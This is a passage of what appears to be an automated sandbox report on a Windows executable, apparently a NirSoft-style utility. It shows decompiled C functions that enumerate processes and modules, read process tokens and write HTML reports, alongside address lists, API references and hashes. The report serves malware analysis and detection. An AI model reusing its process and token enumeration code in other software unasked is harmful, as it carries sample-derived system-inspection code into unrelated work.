				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}



























                                                                                                                0x00409ab0
                                                                                                                0x00409ab7
                                                                                                                0x00409ac8
                                                                                                                0x00409acf
                                                                                                                0x00409ad4
                                                                                                                0x00409ae0
                                                                                                                0x00409ae6
                                                                                                                0x00409ae8
                                                                                                                0x00409af0
                                                                                                                0x00409c3a
                                                                                                                0x00409c41
                                                                                                                0x00409c67
                                                                                                                0x00000000
                                                                                                                0x00409c67
                                                                                                                0x00409c49
                                                                                                                0x00409c50
                                                                                                                0x00409c51
                                                                                                                0x00409c56
                                                                                                                0x00409c57
                                                                                                                0x00409c5a
                                                                                                                0x00000000
                                                                                                                0x00409c64
                                                                                                                0x00409b00
                                                                                                                0x00409b03
                                                                                                                0x00409b06
                                                                                                                0x00409b0b
                                                                                                                0x00409b10
                                                                                                                0x00409ba9
                                                                                                                0x00409bac
                                                                                                                0x00409bc1
                                                                                                                0x00409bc7
                                                                                                                0x00409bcc
                                                                                                                0x00409bd8
                                                                                                                0x00409bf0
                                                                                                                0x00409bf2
                                                                                                                0x00409c23
                                                                                                                0x00409c26
                                                                                                                0x00409c2f
                                                                                                                0x00409c34
                                                                                                                0x00409c34
                                                                                                                0x00000000
                                                                                                                0x00409c2f
                                                                                                                0x00409bf7
                                                                                                                0x00409bfb
                                                                                                                0x00409c02
                                                                                                                0x00409c06
                                                                                                                0x00409c0d
                                                                                                                0x00409c14
                                                                                                                0x00409c17
                                                                                                                0x00409c18
                                                                                                                0x00409c1b
                                                                                                                0x00409c1e
                                                                                                                0x00000000
                                                                                                                0x00409c1e
                                                                                                                0x00409b1f
                                                                                                                0x00409b25
                                                                                                                0x00409b2a
                                                                                                                0x00409b2d
                                                                                                                0x00409b33
                                                                                                                0x00409b3d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409b4b
                                                                                                                0x00409b53
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409b6a
                                                                                                                0x00409b6c
                                                                                                                0x00409b6e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409b77
                                                                                                                0x00409b7b
                                                                                                                0x00409b82
                                                                                                                0x00409b86
                                                                                                                0x00409b8d
                                                                                                                0x00409b8e
                                                                                                                0x00409b94
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00409AB7
                                                                                                                • memset.MSVCRT ref: 00409ACF
                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                • _snwprintf.MSVCRT ref: 00409C5A
                                                                                                                  • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                • memset.MSVCRT ref: 00409B25
                                                                                                                • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                • memset.MSVCRT ref: 00409BC7
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                                                • String ID: %s\%s$GetTokenInformation$Y@
                                                                                                                • API String ID: 3504373036-27875219
                                                                                                                • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                                                • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}






                                                                                                                0x00409179
                                                                                                                0x00409209
                                                                                                                0x00409209
                                                                                                                0x00409185
                                                                                                                0x0040918a
                                                                                                                0x0040918f
                                                                                                                0x00409208
                                                                                                                0x00000000
                                                                                                                0x00409191
                                                                                                                0x0040919e
                                                                                                                0x004091a2
                                                                                                                0x004091a7
                                                                                                                0x004091af
                                                                                                                0x004091b3
                                                                                                                0x004091b8
                                                                                                                0x004091c0
                                                                                                                0x004091c4
                                                                                                                0x004091c9
                                                                                                                0x004091d1
                                                                                                                0x004091d5
                                                                                                                0x004091da
                                                                                                                0x004091e2
                                                                                                                0x004091e6
                                                                                                                0x004091eb
                                                                                                                0x004091ed
                                                                                                                0x004091ed
                                                                                                                0x004091eb
                                                                                                                0x004091da
                                                                                                                0x004091c9
                                                                                                                0x004091b8
                                                                                                                0x004091ff
                                                                                                                0x00409202
                                                                                                                0x00409202
                                                                                                                0x00000000
                                                                                                                0x004091ff

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                • API String ID: 1182944575-70141382
                                                                                                                • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                                                • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                                                                0x004090f5
                                                                                                                0x00409171
                                                                                                                0x00409171
                                                                                                                0x004090fd
                                                                                                                0x00409103
                                                                                                                0x00409107
                                                                                                                0x00409170
                                                                                                                0x00000000
                                                                                                                0x00409170
                                                                                                                0x00409116
                                                                                                                0x0040911a
                                                                                                                0x0040911f
                                                                                                                0x00409127
                                                                                                                0x0040912b
                                                                                                                0x00409130
                                                                                                                0x00409138
                                                                                                                0x0040913c
                                                                                                                0x00409141
                                                                                                                0x00409149
                                                                                                                0x0040914d
                                                                                                                0x00409152
                                                                                                                0x0040915a
                                                                                                                0x0040915e
                                                                                                                0x00409163
                                                                                                                0x00409165
                                                                                                                0x00409165
                                                                                                                0x00409163
                                                                                                                0x00409152
                                                                                                                0x00409141
                                                                                                                0x00409130
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                • API String ID: 667068680-3953557276
                                                                                                                • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                                                • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 56%
                                                                                                                			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}












                                                                                                                0x00409faf
                                                                                                                0x00409fb4
                                                                                                                0x00409fb5
                                                                                                                0x00409fb6
                                                                                                                0x0040a043
                                                                                                                0x0040a04a
                                                                                                                0x0040a058
                                                                                                                0x0040a05f
                                                                                                                0x0040a06d
                                                                                                                0x0040a074
                                                                                                                0x0040a08e
                                                                                                                0x0040a099
                                                                                                                0x0040a0ab
                                                                                                                0x0040a0c9
                                                                                                                0x0040a0ce
                                                                                                                0x00000000
                                                                                                                0x0040a0ce
                                                                                                                0x00409fc3
                                                                                                                0x00409fca
                                                                                                                0x00409fd8
                                                                                                                0x00409fdf
                                                                                                                0x00409ff9
                                                                                                                0x0040a006
                                                                                                                0x0040a018
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf
                                                                                                                • String ID: %%0.%df
                                                                                                                • API String ID: 3473751417-763548558
                                                                                                                • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                                                • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 51%
                                                                                                                			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}













                                                                                                                0x00406216
                                                                                                                0x0040621b
                                                                                                                0x00406222
                                                                                                                0x0040625f
                                                                                                                0x00406263
                                                                                                                0x00406269
                                                                                                                0x00406271
                                                                                                                0x00406273
                                                                                                                0x00406289
                                                                                                                0x00406289
                                                                                                                0x0040628e
                                                                                                                0x0040628f
                                                                                                                0x004062a9
                                                                                                                0x004062ab
                                                                                                                0x004062ad
                                                                                                                0x004062b0
                                                                                                                0x004062c3
                                                                                                                0x004062c3
                                                                                                                0x004062d3
                                                                                                                0x004062da
                                                                                                                0x004062f1
                                                                                                                0x004062f7
                                                                                                                0x004062fe
                                                                                                                0x0040630d
                                                                                                                0x00406312
                                                                                                                0x0040631e
                                                                                                                0x00406327
                                                                                                                0x00406275
                                                                                                                0x00406283
                                                                                                                0x00406283
                                                                                                                0x00406285
                                                                                                                0x00406287
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406277
                                                                                                                0x0040627a
                                                                                                                0x00406280
                                                                                                                0x00406280
                                                                                                                0x00000000
                                                                                                                0x00406280
                                                                                                                0x00000000
                                                                                                                0x0040627a
                                                                                                                0x00000000
                                                                                                                0x00406283
                                                                                                                0x00406273
                                                                                                                0x00406224
                                                                                                                0x00406224
                                                                                                                0x00406229
                                                                                                                0x0040622a
                                                                                                                0x0040622f
                                                                                                                0x00406236
                                                                                                                0x0040623c
                                                                                                                0x00406243
                                                                                                                0x00406245
                                                                                                                0x00406247
                                                                                                                0x00406248
                                                                                                                0x0040624b
                                                                                                                0x00406254
                                                                                                                0x00406254
                                                                                                                0x0040632d
                                                                                                                0x00406334

                                                                                                                APIs
                                                                                                                • LoadMenuW.USER32 ref: 00406236
                                                                                                                  • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                                                  • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                                                  • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                                                  • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                                                • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                                                • CreateDialogParamW.USER32 ref: 004062A9
                                                                                                                • GetDesktopWindow.USER32 ref: 004062B4
                                                                                                                • CreateDialogParamW.USER32 ref: 004062C1
                                                                                                                • memset.MSVCRT ref: 004062DA
                                                                                                                • GetWindowTextW.USER32 ref: 004062F1
                                                                                                                • EnumChildWindows.USER32 ref: 0040631E
                                                                                                                • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                                                  • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                • String ID: caption
                                                                                                                • API String ID: 973020956-4135340389
                                                                                                                • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                                                • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 65%
                                                                                                                			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

















                                                                                                                0x004081e4
                                                                                                                0x004081ec
                                                                                                                0x004081fc
                                                                                                                0x00408200
                                                                                                                0x00408215
                                                                                                                0x0040821c
                                                                                                                0x0040822a
                                                                                                                0x00408231
                                                                                                                0x0040823f
                                                                                                                0x00408246
                                                                                                                0x0040824b
                                                                                                                0x0040824e
                                                                                                                0x0040825a
                                                                                                                0x0040825c
                                                                                                                0x00408261
                                                                                                                0x0040826c
                                                                                                                0x0040826d
                                                                                                                0x0040826e
                                                                                                                0x00408273
                                                                                                                0x00408273
                                                                                                                0x00408276
                                                                                                                0x0040827c
                                                                                                                0x0040828a
                                                                                                                0x00408290
                                                                                                                0x004082ab
                                                                                                                0x004082c5
                                                                                                                0x004082c6
                                                                                                                0x004082d1
                                                                                                                0x004082d2
                                                                                                                0x004082d3
                                                                                                                0x004082e7
                                                                                                                0x004082ec
                                                                                                                0x004082f0
                                                                                                                0x00000000
                                                                                                                0x004082f5
                                                                                                                0x004082fe

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf$wcscpy
                                                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                • API String ID: 1283228442-2366825230
                                                                                                                • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                                                • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                                                                0x0040920a
                                                                                                                0x00409218
                                                                                                                0x00409223
                                                                                                                0x0040922c
                                                                                                                0x0040924b
                                                                                                                0x00409253
                                                                                                                0x0040929b
                                                                                                                0x004092e4
                                                                                                                0x0040929d
                                                                                                                0x004092a3
                                                                                                                0x004092b1
                                                                                                                0x004092bd
                                                                                                                0x004092cc
                                                                                                                0x004092d1
                                                                                                                0x004092d8
                                                                                                                0x004092dd
                                                                                                                0x00409255
                                                                                                                0x0040925b
                                                                                                                0x00409269
                                                                                                                0x00409275
                                                                                                                0x00409282
                                                                                                                0x0040928d
                                                                                                                0x00409292
                                                                                                                0x004092ec
                                                                                                                0x004092ef
                                                                                                                0x004092ef
                                                                                                                0x00409231
                                                                                                                0x00409232
                                                                                                                0x00409233
                                                                                                                0x00000000
                                                                                                                0x00409239
                                                                                                                0x0040921a
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 00409223
                                                                                                                • wcscpy.MSVCRT ref: 00409233
                                                                                                                  • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                                                  • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                                                  • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                                                • wcscpy.MSVCRT ref: 00409282
                                                                                                                • wcscat.MSVCRT ref: 0040928D
